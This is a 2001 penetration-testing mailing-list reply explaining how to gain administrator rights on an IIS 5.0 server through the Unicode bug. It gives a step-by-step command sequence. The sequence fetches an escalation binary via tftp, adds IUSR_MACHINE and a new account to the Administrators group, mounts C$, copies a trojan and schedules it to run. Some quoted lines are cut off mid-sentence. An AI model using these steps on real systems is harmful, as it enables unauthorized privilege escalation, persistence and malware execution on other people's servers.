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Re: [PEN-TEST] admin rights on an IIS 5.0 with unicode bug?

From: Nelson Brito <nelson () SECUNET COM BR>
Date: Mon, 26 Mar 2001 13:39:22 -0300

Renato Ettisberger wrote:


I'm doing a pen test and I found a IIS 5.0 (Win2k) with the Unicode bug.

As you know, there is a way to span a shell with admin rights on a IIS 4.0
with the Unicode bug.

What way? Did you use CmdAsp.ASP to do that? Is it possible?

I ask me, if there is a way to gain admin rights on an IIS 5.0, Win2k with
the Unicode bug too?

Yes, you can elevate IUSR_MACHINE's privilege to Administrators/Domain Admins Group.

As an example:
C:\BIGHacker> "C:\\WINNT\\system32\\tftp.exe -i GET netddemsg.exe"
C:\BIGHacker> "netddemsg.exe \"C:\\WINNT\\system32\\net.exe localgroup 
Administrators IUSR_MACHINE /add\""

Then you'll have IUSR_MACHINE with Admin's privileges. So you could use the CmdAsp.ASP.

But, if you want a "lamer's technique" you could do this after the commands above:
C:\BIGHacker> "C:\\WINNT\\system32\\net.exe user bighacker bighacker /add"
C:\BIGHacker> "C:\\WINNT\\system32\\net.exe localgroup Administrators bighacker /add"
C:\BIGHacker>net use H: \\\C$ bighacker /u:bighacker
C:\BIGHacker>copy my_favorite_trojan.exe H:\Temp
C:\BIGHacker>at \\\C$ 13:37A H:\Temp\my_favorite_trojan.exe

If the Schedule Service is stopped you'll need use the NTRK's "SC.EXE" tool(sc.exe \\ start schedule).

PS: Of course this technique only works if the traffic to port 139 TCP is permitted.

If I'm able to dump the password hash in crude form, how can I crack the

Yes, you can. If you elevate IUSR_MACHINE's privileges you should do anything you

PPS: Sorry my poor English.

Sem mais,
# Nelson Brito - IBQN / Security Networks AG - The trust Company!
# "Windows NT can also  be protected from nmap OS detection scans
# thanks to *Nelson Brito* ..."
#              Passage from "Hack Proofing your Network", page 93
open(S,shift) || die "Use: $0 <file>\n";
foreach(<S>){ chop; split(//,$_); print reverse @_; print "\n"; }

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